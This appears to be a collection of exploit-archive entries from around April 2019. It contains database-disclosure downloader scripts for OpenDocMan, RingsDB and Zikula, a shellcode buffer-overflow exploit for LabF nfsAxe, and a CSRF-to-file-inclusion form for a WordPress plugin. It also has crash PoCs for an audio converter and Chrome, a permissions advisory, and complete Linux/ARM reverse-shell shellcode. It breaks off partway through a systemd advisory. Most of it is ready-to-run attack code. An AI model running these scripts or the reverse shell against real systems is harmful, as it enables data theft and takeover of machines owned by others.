# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
OpenDocMan - Free PHP Document Management System DMS

OpenDocMan is a web based document management system (DMS) written in PHP designed to

comply with ISO 17025 and OIE standard for document management. It features fine grained

control of access to files, and automated install and upgrades.

Features

* Upload files using web browser
* Control access to files based on department or individual user permissions
* Track revisions of documents
* Option to send new and updated files through review process
* Installs on most web servers with PHP
* Set up a reviewal process for all new files

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

* It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

File :
******
/database.sql

Information :
*************
# MySQL dump of OpenDocMan

# Table structure for table 'odm_access_log'

# Table structure for table 'odm_admin'

# Dumping data for table 'odm_admin'

# Table structure for table 'odm_category'

# Dumping data for table 'odm_category'

# Table structure for table 'odm_data'

# Dumping data for table 'odm_data'

# Table structure for table 'odm_department'

# Dumping data for table 'odm_department'

# Table structure for table 'odm_dept_perms'

# Dumping data for table 'odm_dept_perms'

# Table structure for table 'odm_dept_reviewer'

# Dumping data for table 'odm_dept_reviewer'

# Dumping data for table 'odm_log'

# Table structure for table 'odm_rights'

# Dumping data for table 'odm_rights'

# Table structure for table 'odm_user'

raw.githubusercontent.com/opendocman/opendocman/master/database.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
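#!/usr/bin/python
# OpenDocMan 1.3.5 - fetch the publicly reachable database.sql.
# Run it and enter the site's base URL (e.g. http://host/opendocman).
import re
import sys

try:  # Python 2
    from urllib2 import Request, urlopen, HTTPError, URLError
    read_line = raw_input
except ImportError:  # Python 3
    from urllib.request import Request, urlopen
    from urllib.error import HTTPError, URLError
    read_line = input

DISC = "/database.sql"


def build_url(base_url, disc=DISC):
    """Join the user-supplied base URL and the dump path without a double slash."""
    return base_url.rstrip("/") + disc


def fetch_dump(base_url, disc=DISC):
    """GET the dump and return its body as text, or None on failure.

    HTTP errors and connection failures are reported instead of raising
    (the original let urlopen's exception abort the script).
    """
    url = build_url(base_url, disc)
    try:
        resp = urlopen(Request(url))
    except HTTPError as e:
        print("[-] HTTP %s for %s" % (e.code, url))
        return None
    except URLError as e:
        print("[-] Request failed: %s" % e.reason)
        return None
    body = resp.read()
    if not isinstance(body, str):  # Python 3 returns bytes
        body = body.decode("utf-8", "replace")
    return body


def looks_like_dump(html):
    """True when the body carries a MySQL dump header (the advisory's sample
    starts with '# MySQL dump of OpenDocMan'); a 200 with an HTML page is a
    soft 404."""
    return re.search(r"mysql ?dump", html, re.I) is not None


def find_matches(html):
    """Return the 'resources...' fragments the original script grepped for.

    The pattern is kept from the original PoC; the trailing '=*' is redundant
    because '.*' already consumes the rest of the line.
    """
    return re.findall("resources.*=*", html)


def main():
    html = fetch_dump(read_line("URL: "))
    if html is None:
        sys.exit(1)
    if not looks_like_dump(html):
        print("[!] Response does not look like a SQL dump")
    print("Result")
    print(str(find_matches(html)))


if __name__ == "__main__":
    main()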

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
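#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Downloads OpenDocMan's publicly reachable database.sql.
#
#   perl $0 site.com /path/ [output-file]
#
# Changes from the original PoC: the banner is printed instead of being
# passed to system() (which tried to execute it as a command), the
# Windows-only `cls`/`color` calls are dropped, the unused LWP::Simple is
# gone, and the dump is saved to a file named on the command line (default:
# database.sql in the current directory) rather than to a hard-coded D:/
# path that the original silently overwrote $File with.
use strict;
use LWP::UserAgent;

my $FILE = "database.sql";

sub help {
    print "[+] usage1 : perl $0 site.com /path/ \n";
    print "[+] usage2 : perl $0 localhost / \n";
}

print "OpenDocMan Document Management System 1.3.5 Database Disclosure Exploit\n";

if (@ARGV < 2) {
    print "[-]How To Use\n\n";
    help();
    exit();
}

my ($target, $path, $out) = @ARGV;
$out = "database.sql" unless defined $out;

my $url = "http://" . $target . $path . $FILE;
print "\n Wait Please Dear Hacker!!! \n\n";

my $ua = LWP::UserAgent->new();
my $response = $ua->get($url, ":content_file" => $out);

if ($response->is_success) {
    # A 200 with an HTML body is most likely a soft-404 or login page, not the dump.
    if (($response->content_type || '') =~ /html/i) {
        print "[!] $url returned HTML, not a SQL dump; inspect $out before trusting it\n";
    }
    print "[+] $url Exploited!\n\n";
    print "[+] Database saved to $out\n";
    exit();
}
else {
    print "[!] Exploiting $url Failed !\n[!] " . $response->status_line . "\n";
    exit();
}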

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################


RingsDB Software 1.0.0 Database Disclosure


RingsDB Software version 1.0.0 suffers from a database disclosure vulnerability: the card, pack and scenario SQL fixtures shipped in the project repository are reachable under the web root. These files hold public game data (the same content is in the public repository), so on an unmodified install the exposure is of low sensitivity; no user or credential tables are among the files listed below.


MD5 | 471e6c02e01d3f19f34121044d85849e

###########################################################################

# Exploit Title : RingsDB Software 1.0.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : ringsdb.com
# Software Download Link : github.com/Sydtrack/ringsdb/archive/1.0.0.zip
# Software Information Link : ringsdb.com/about
# Software Version : 1.0.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Deckbuilder for The Lord of the Rings (Physical / Digital) Library System.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

* It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

Very quick guide on how to install a local copy =>
*********************************************
This guide assumes you know how to use the command-line and
that your machine has php and mysql installed.

install composer: getcomposer.org/download/
clone the repo somewhere
cd to it
run composer install (at the end it will ask for the database configuration parameters)
run php app/console doctrine:database:create
run php app/console doctrine:schema:create
import data into mysql
run php app/console server:run

###########################################################################

File :
******
/card-data.sql

Information :
*************
-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `card`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/card-data.sql

File :
*****
/packs-data.sql

Information :
*************
-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `cycle`

-- Dumping data for table `pack`

-- Dumping data for table `sphere`

-- Dumping data for table `type`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

raw.githubusercontent.com/Sydtrack/ringsdb/master/packs-data.sql

File :
*****
/scenario-data.sql

Information :
*************
-- MySQL dump 10.13 Distrib 5.6.19, for osx10.7 (i386)
--
-- Host: localhost Database: ringsdb
-- ------------------------------------------------------
-- Server version 5.6.21

-- Dumping data for table `encounter`

-- Dumping data for table `scenario`

-- Dumping data for table `scenario_encounter`

-- Dumping routines for database 'ringsdb'

-- Dump completed.

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
# Fetches one hard-coded path under a user-supplied base URL and prints any
# "resources..." matches from the response body. Python 2 only (urllib2,
# print statement, raw_input).
import string  # unused
import re
from urllib2 import Request, urlopen
disc = "/card-data.sql"  # the dump file whose exposure the advisory reports
url = raw_input ("URL: ")  # no scheme/trailing-slash normalisation is done
req = Request(url+disc)
rta = urlopen(req)  # no error handling: a non-2xx response raises and aborts the script
print "Result"
html = rta.read()
# ".*" already consumes the rest of the line, so the trailing "=*" adds nothing.
rdo = str(re.findall("resources.*=*", html))
print rdo
exit  # bare name, not a call: this line has no effect

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Downloads one hard-coded file from http://<host><path> and saves it to a
# fixed local path. Written for Windows: 'cls' and 'color' are cmd.exe builtins.

use LWP::Simple;
use LWP::UserAgent;

system('cls');
# The banner text is passed to the shell as a command, so it just fails;
# presumably a console 'title ...' was intended.
system('RingsDB 1.0.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
# Usage text; the empty prototype is superfluous for a sub called with no args.
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

# Any third argument is discarded: $File is always overwritten here.
$File="card-data.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
# :content_file streams the body straight to disk; the destination is hard-coded
# and the request dies if the D: drive/directory is not writable.
my $request = $useragent->get($url,":content_file" => "D:/card-data.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/card-data.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################

Zikula Core CMS 2.0.13 Database Disclosure


Zikula Core CMS version 2.0.13 suffers from a database disclosure vulnerability.


MD5 | 4248612d6ed9e264d30e0b02c65dfddc

###########################################################################

# Exploit Title : Zikula Core CMS 2.0.13 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : ziku.la
# Software Download Link : github.com/zikula/core/releases/download/2.0.13/2.0.zip
# Software Information Link : ziku.la/en/documentation
# Software Version : 2.0 and 2.0.13 - All Lower Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Zikula Core is an Application Framework which extends Symfony 4.x and includes technologies

fostering a dynamic modular development paradigm and Twig-based theming system which

allows for rapid website and application development.

Zikula can quickly become a Content Management System utilizing community-driven modules.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains a phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

* It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

# Requirements :
****************
Zikula Core requires PHP >= 7.2.0
Additional server considerations can be found on the Symfony site
Zikula requires more memory than typical to install. You should set your
memory limit in php.ini to 128 MB for the installation process.
Zikula requires that date.timezone be set in the php.ini configuration file (or .htaccess).
Zikula requires AllowOverride All and the mod_rewrite module (be aware the
Apache 2.3.9+ has changed the default setting for AllowOverride to None).
Zikula also requires other php extensions and configurations. These are checked during
the installation process and if there are problems, you will be notified. If you
discover errors, check with your hosting provider on how to rectify these issues.
Typically, they will require changing the php.ini file or possibly reconfiguring
the php installation by your provider.

###########################################################################

File :
******
/core/test_dbs/core143.sql

/test_dbs/core143.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Nov 05, 2016 at 10:39 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `upgrading143back`

-- Table structure for table `admin_category`

-- Dumping data for table `admin_category`

-- Table structure for table `users`

-- Dumping data for table `users`

File :
******
/test_dbs/core144.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Dec 08, 2016 at 04:56 PM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `144`

File :
******
/test_dbs/core145.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Jan 12, 2017 at 10:00 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `zk14x`

File :
******
/test_dbs/core146.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Apr 01, 2017 at 11:17 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `zk14x`

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
# Fetches one hard-coded path under a user-supplied base URL and prints any
# "resources..." matches from the response body. Python 2 only (urllib2,
# print statement, raw_input).
import string  # unused
import re
from urllib2 import Request, urlopen
disc = "/test_dbs/core143.sql"  # the dump file whose exposure the advisory reports
url = raw_input ("URL: ")  # no scheme/trailing-slash normalisation is done
req = Request(url+disc)
rta = urlopen(req)  # no error handling: a non-2xx response raises and aborts the script
print "Result"
html = rta.read()
# ".*" already consumes the rest of the line, so the trailing "=*" adds nothing.
rdo = str(re.findall("resources.*=*", html))
print rdo
exit  # bare name, not a call: this line has no effect

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Downloads one hard-coded file from http://<host><path> and saves it to a
# fixed local path. Written for Windows: 'cls' and 'color' are cmd.exe builtins.

use LWP::Simple;
use LWP::UserAgent;

system('cls');
# The banner text is passed to the shell as a command, so it just fails;
# presumably a console 'title ...' was intended.
system('Zikula Core CMS 2.0.13 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
# Usage text; the empty prototype is superfluous for a sub called with no args.
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

# Any third argument is discarded: $File is always overwritten here.
$File="test_dbs/core143.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
# :content_file streams the body straight to disk; the destination directory
# D:/test_dbs/ must already exist or the save fails.
my $request = $useragent->get($url,":content_file" => "D:/test_dbs/core143.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/test_dbs/core143.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################

LabF nfsAxe 3.7 Ping Client Buffer Overflow


LabF nfsAxe version 3.7 ping client buffer overflow exploit.


MD5 | 5d9d8cf6205f6f1d0106f3799e19dba3

#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
# 3.) Click Start and calc pops
#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)

# Python 2 (print statement). Builds a fixed 220-byte string and writes it to
# a text file; the header comment above documents where each part comes from.
shellcode = ("\x31\xC9"
"\x51"
"\x68\x63\x61\x6C\x63"
"\x54"
"\xB8\xC7\x93\xC2\x77"
"\xFF\xD0")

# Filler length is derived so the total is always 220 bytes.
buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)

payload = buffer  # alias; the same object is written below
try:
f=open("nfsaxeping.txt","w")
print "[+] Creating %s bytes ping payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
# bare except: swallows the actual error (permissions, path, ...)
print "File cannot be created"

WordPress Contact Form Builder 1.0.67 CSRF / LFI


WordPress Contact Form Builder plugin version 1.0.67 suffers from cross site request forgery and local file inclusion vulnerabilities.


MD5 | f6686ff9fc966ce12dba21aec12aaeb0

# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamically loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

PoC
---

```html
<!-- PoC form: the traversal string travels in the URL's ?action= query
parameter, while the <select> supplies the plugin's AJAX action in the POST
body, so the two "action" values reach the handler separately (as described
above). Host name is the author's test site. -->
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<!-- Any of the four handlers listed in the Description routes to the same function. -->
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```



Ease Audio Converter 5.30 Denial Of Service


Ease Audio Converter version 5.30 .mp4 denial of service proof of concept exploit.


MD5 | 3941c264054fddc13021529d5bcc2391

# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
# Date: 19.04.19
# Vendor Homepage:http://www.audiotool.net/download.htm
# Software Link: http://www.audiotool.net/download/audioconverter.exe
# Exploit Author: Achilles
# Tested Version: 5.30
# Tested on: Windows 7 x64 Sp1

# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
# 3.- Load the file "Evil.mp4"
# 4.- Click ok
# 5.- Click Cut
# 6.- And you will see a crash.



#!/usr/bin/env python
# Python 2 (print statement). Writes 6000 'A' bytes to Evil.mp4 in the
# current directory; the file is then opened manually in the application.
buffer = "\x41" * 6000

try:
f=open("Evil.mp4","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
# bare except: swallows the actual error (permissions, path, ...)
print "File cannot be created"

Google Chrome 73.0.3683.103 V8 JavaScript Engine Denial Of Service


Google Chrome version 73.0.3683.103 V8 JavaScript Engine out-of-memory in invalid table size denial of service proof of concept exploit.


MD5 | 5b21bbbc8965966812bc51d2fe34bb3f

<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid table size

# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->


<html>
<head>
<script>
// PoC structure: reduce() over arr1 invokes f3 as its callback, which swaps
// obj1.make for a very large RegExp; the following join()/
// getOwnPropertyDescriptors() call then operates on that oversized value.
// Presumably that step is what exhausts memory (see the chromium issue linked
// above) -- not verified here.

var arr1 = [0,1];

// Plain constructor; obj1 below is created with make === undefined.
function ObjCreate(make) {
this.make = make;
}

var obj1 = new ObjCreate();

// Entry point, run from <body onload>.
function main() {

arr1.reduce(f3);

Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));

}

// reduce() callback: ignores its arguments and mutates obj1 as a side effect.
function f3() {

obj1["make"] = RegExp(Array(60000).join("CCC"));
}

</script>
</head>
<body onload=main()></body>
</html>

Ross Video DashBoard 8.5.1 Insecure Permissions


Ross Video DashBoard version 8.5.1 suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the 'M' flag (Modify) or 'C' flag (Change) for the 'Authenticated Users' group.


MD5 | 213fc44c941da29b2eaecd65db51c680


Ross Video DashBoard 8.5.1 Insecure Permissions


Vendor: Ross Video Ltd.
Product web page: https://www.rossvideo.com
Affected version: 8.5.1

Summary: DashBoard is a free and open platform from Ross Video for facility
control and monitoring that enables users to quickly build unique, tailored
Custom Panels that make complex operations simple.

Desc: DashBoard suffers from an elevation of privileges vulnerability which
can be used by a simple authenticated user that can change the executable file
with a binary of choice. The vulnerability exists due to improper permissions,
with the 'M' flag (Modify) or 'C' flag (Change) for the 'Authenticated Users' group.

Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2019-5516
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5516.php


23.04.2019

--


C:\DashBoard>icacls DashBoard.exe && cacls DashBoard.exe
DashBoard.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
C:\DashBoard\DashBoard.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C


Linux/ARM Password Protected Reverse TCP Shell Shellcode


A 100-byte Linux/ARM password protected reverse TCP shell shellcode.


MD5 | 8354c706305152c8ac2968de64f559b7

/*
* Title: Linux/ARM - Password-Protected Reverse TCP Shell
* Date: 2019-04-20
* Tested: armv6 (32-bit Raspberry Pi I)
* Author: Alan Vivona - @syscall59 - medium.syscall59.com
* Size: 100 bytes
* No null bytes / Null-free
*/

// Layout: thumb-mode code followed by the data it needs (sockaddr, command,
// password); placeholder bytes in that data are patched at runtime so the
// assembled blob stays null-free.
.section .text
.global _start
_start:

.arm
add r3, pc, #1 // switch to thumb mode
bx r3

.thumb

// [281] socket(2, 1, 0)
mov r0, #2
mov r1, #1
eor r2, r2
mov r7, #200
add r7, #81
svc #1
mov r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen)
// socket fd is in r0 already
adr r1, target
strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
mov r2, #16
add r7, #2 // 281 + 2 = 283
svc #1

// [003] read(sourcefd, destbuffer, amount)
// Reads 4 bytes from the socket into a stack slot and loops until they equal
// `pass` (16-bit thumb eor sets the flags that bne tests).
push {r1}
mov r1, sp
mov r2, #4
mov r7, #3
read_pass:
mov r0, r10
svc #1
check_pass:
ldr r3, pass
ldr r4, [r1]
eor r3, r3, r4
bne read_pass

// [063] dup2(sockfd, stdIO)
mov r1, #2 // r1 = 2 (stderr)
mov r7, #63 // r7 = 63 (dup2)
loop_stdio:
mov r0, r10 // r0 = saved sockfd
svc #1
sub r1,#1
bpl loop_stdio // loop while r1 >= 0 (the counter is r1; sub sets the flags)

// [011] execve(command, 0, 0)
adr r0, command
eor r2, r2
eor r1, r1
strb r2, [r0, #7]
mov r7, #11
svc #1

// 2-byte alignment fix, if needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

target:
// The 0xff will be replaced with a null on runtime
.ascii "\x02\xff" // Protocol: IPv4/TCP.

.ascii "\x11\x5c" // Port : 4444

// The '255' will be replaced with a 0 on runtime
.byte 127,255,255,1 // IP: 127.0.0.1.

command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime

pass: .ascii "S59!"


/*
Compile, link & extract:

as ARM-reverse-shell.s -o ARM-reverse-shell.o
ld -N ARM-reverse-shell.o -o ARM-reverse-shell
objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
hexdump -v -e '"\\""x" 1/1 "%02x"""' ARM-reverse-shell.dump

\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
\x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
\x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21

*/

systemd Seat Verification Active Session Spoofing


systemd suffers from a lack of seat verification in the PAM module and in turn permits the spoofing of an active session to polkit.


MD5 | da7d4cd8a891ee21f0b9d4c6fec61329

systemd: lack of seat verification in PAM module permits spoofing active session to polkit 

Related CVE Numbers: CVE-2019-3842.


[I am sending this bug report to Ubuntu as requested by systemd at
<https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports>.]

As documented at
<https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>, for
any action, a polkit policy can specify separate levels of required
authentication based on whether a client is:

- in an active session on a local console
- in an inactive session on a local console
- or neither

This is expressed in the policy using the elements "allow_any",
"allow_inactive" and "allow_active". Very roughly speaking, the idea here is
to give special privileges to processes owned by users that are sitting
physically in front of the machine (or at least, a keyboard and a screen that
are connected to a machine), and restrict processes that e.g. belong to users
that are ssh'ing into a machine.

For example, the ability to refresh the system's package index is restricted
this way using a policy in
/usr/share/polkit-1/actions/org.freedesktop.packagekit.policy:

<action id=\"org.freedesktop.packagekit.system-sources-refresh\">
[...]
<description>Refresh system repositories</description>
[...]
<message>Authentication is required to refresh the system repositories</message>
[...]
<defaults>
<allow_any>auth_admin</allow_any>
<allow_inactive>auth_admin</allow_inactive>
<allow_active>yes</allow_active>
</defaults>
</action>


On systems that use systemd-logind, polkit determines whether a session is
associated with a local console by checking whether systemd-logind is tracking
the session as being associated with a "seat". This happens through
polkit_backend_session_monitor_is_session_local() in
polkitbackendsessionmonitor-systemd.c, which calls sd_session_get_seat().
The check whether a session is active works similarly.

